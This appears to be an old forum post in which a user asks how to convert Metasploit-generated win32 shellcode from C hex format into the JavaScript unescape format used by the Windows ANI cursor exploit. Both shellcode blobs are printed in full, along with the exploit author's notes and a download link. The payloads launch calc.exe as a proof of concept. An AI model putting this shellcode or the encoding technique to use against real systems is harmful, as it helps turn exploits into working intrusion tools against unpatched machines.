unescape shellcode: how do I do it?

schizo6

User
Joined
August 18, 2008
Posts
1
Hi, I have a problem with a certain exploit:
Windows Animated Cursor Handling Exploit
Its shellcode is written like this:
Code:
shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065");

This one happens to launch calc.exe,
and now I don't know how to take shellcode like this, generated at metasploit.com

Code:
/* win32_exec -  EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char scode[] =
"\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x44"
"\x46\x39\xc7\x83\xeb\xfc\xe2\xf4\xb8\xae\x7d\xc7\x44\x46\xb2\x82"
"\x78\xcd\x45\xc2\x3c\x47\xd6\x4c\x0b\x5e\xb2\x98\x64\x47\xd2\x8e"
"\xcf\x72\xb2\xc6\xaa\x77\xf9\x5e\xe8\xc2\xf9\xb3\x43\x87\xf3\xca"
"\x45\x84\xd2\x33\x7f\x12\x1d\xc3\x31\xa3\xb2\x98\x60\x47\xd2\xa1"
"\xcf\x4a\x72\x4c\x1b\x5a\x38\x2c\xcf\x5a\xb2\xc6\xaf\xcf\x65\xe3"
"\x40\x85\x08\x07\x20\xcd\x79\xf7\xc1\x86\x41\xcb\xcf\x06\x35\x4c"
"\x34\x5a\x94\x4c\x2c\x4e\xd2\xce\xcf\xc6\x89\xc7\x44\x46\xb2\xaf"
"\x78\x19\x08\x31\x24\x10\xb0\x3f\xc7\x86\x42\x97\x2c\x38\xe1\x25"
"\x37\x2e\xa1\x39\xce\x48\x6e\x38\xa3\x25\x58\xab\x27\x68\x5c\xbf"
"\x21\x46\x39\xc7";

and get it into the same format as the one in this exploit. I would be veeery grateful if someone could help me with this, because I need it for school.

And I know that this exploit's shellcode was generated with Metasploit, because I read:
Code:
Microsoft ANI Buffer Overflow Exploit

Author: Trirat Puttaraksa
http://sf-freedom.blogspot.com

Tested on: Windows XP SP2 fully patched + IE 6 SP2

For educational purpose only

There are many confuses about this vulnerability. Someone said that this could
not be exploited in XP SP2 - that's wrong. I provide this exploit because I 
wanna to tell these people that they are in danger. 
This exploit will call calc.exe (shellcode from metasploit win32_exec 
CMD=calc.exe EXITFUNC=process).

P.S. I do not include the source code for generate the .ani file because of
its damage. However, if you reverse engineer .ani file, you will know how
could I produce this exploit in 10 minutes.

I will describe this vulnerability and how to exploit it in my blog 
after M$ released patch.

greets: used SkyLined's idea of exploitation.  tnx to him.

http://www.milw0rm.com/sploits/04012007-ani.zip

# milw0rm.com [2007-04-01]


Thanks in advance for your help!